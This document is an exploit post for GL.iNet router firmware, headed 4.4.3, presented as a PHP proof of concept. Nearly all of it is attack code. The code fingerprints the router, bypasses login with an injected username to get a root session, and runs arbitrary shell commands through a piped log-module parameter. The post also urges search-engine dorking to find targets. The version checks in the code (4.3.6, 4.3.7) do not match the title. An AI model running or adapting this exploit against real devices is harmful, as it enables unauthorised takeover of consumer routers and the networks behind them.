GL.iNet 4.4.3 Code Injection
=============================================================================================================================================
| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.gl-inet.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine. [+] uses the CURL to Allow remote command . [+] Line 158 set your target . [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?php
class GlinetExploit
{
private $targetUri;
private $sid;
private $glinet;
public function __construct($targetUri)
{
$this->targetUri = $targetUri;
$this->glinet = [
‘model’ => null,
‘firmware’ => null,
‘arch’ => null
];
}
private function send_request($method, $uri, $data = null, $headers = [])
{
$ch = curl_init();
$options = [
CURLOPT_URL => $this->targetUri . $uri,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CUSTOMREQUEST => $method
];
if ($data) {
$options[CURLOPT_POSTFIELDS] = $data;
$headers[] = ‘Content-Type: application/json’;
}
curl_setopt_array($ch, $options);
$response = curl_exec($ch);
curl_close($ch);
return $response ? json_decode($response, true) : null;
}
public function check_vuln_version()
{
$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘call’,
‘params’ => [”, ‘ui’, ‘check_initialized’, []]]);
$res = $this->send_request(‘POST’, ‘/rpc’, $postData);
if ($res && isset($res[‘result’])) {
$this->glinet[‘model’] = $res[‘result’][‘model’];
$this->glinet[‘firmware’] = $res[‘result’][‘firmware_version’];
}
// Check for vulnerable models and firmware
switch ($this->glinet[‘model’]) {
case ‘sft1200’:
$this->glinet[‘arch’] = ‘mipsle’;
return version_compare($this->glinet[‘firmware’], ‘4.3.6’, ‘==’);
case ‘ar750’:
case ‘ar750s’:
$this->glinet[‘arch’] = ‘mipsbe’;
return version_compare($this->glinet[‘firmware’], ‘4.3.7’, ‘==’);
// Add more cases as per your requirement
}
return false;
}
public function auth_bypass()
{
if (!empty($this->sid)) {
return $this->sid;
}
$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘challenge’,
‘params’ => [‘username’ => ‘root’]]);
$res = $this->send_request(‘POST’, ‘/rpc’, $postData);
if ($res && isset($res[‘result’][‘nonce’])) {
$nonce = $res[‘result’][‘nonce’];
$username = “roo[^’union selecT char(114,111,111,116)–]:[^:]+:[^:]+”;
$pw = ‘0’;
$hash = md5(“$username:$pw:$nonce”);
$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘login’,
‘params’ => [
‘username’ => $username,
‘hash’ => $hash
]]);
$res = $this->send_request(‘POST’, ‘/rpc’, $postData);
if ($res && isset($res[‘result’][‘sid’])) {
$this->sid = $res[‘result’][‘sid’];
return $this->sid;
}
}
return null;
}
public function execute_command($cmd)
{
$payload = base64_encode($cmd);
$cmd = “echo {$payload}|openssl enc -base64 -d -A|sh”;
$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘call’,
‘params’ => [
$this->sid,
‘logread’,
‘get_system_log’,
[‘lines’ => ”, ‘module’ => “|{$cmd}”]]]);
return $this->send_request(‘POST’, ‘/rpc’, $postData, [‘Admin-Token: ‘ . $this->sid]);
}
public function check()
{
if ($this->check_vuln_version()) {
return “Vulnerable: {$this->glinet[‘model’]} | {$this->glinet[‘firmware’]} | {$this->glinet[‘arch’]}”;
}
return ‘Not Vulnerable’;
}
public function exploit($command)
{
$this->sid = $this->auth_bypass();
if ($this->sid) {
echo “SID: {$this->sid}\n”;
echo “Executing: {$command}\n”;
$this->execute_command($command);
} else {
echo “Authentication bypass failed.\n”;
}
}
}
// Usage
$exploit = new GlinetExploit(‘https://target-url’);
$exploit->exploit(‘ls’);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================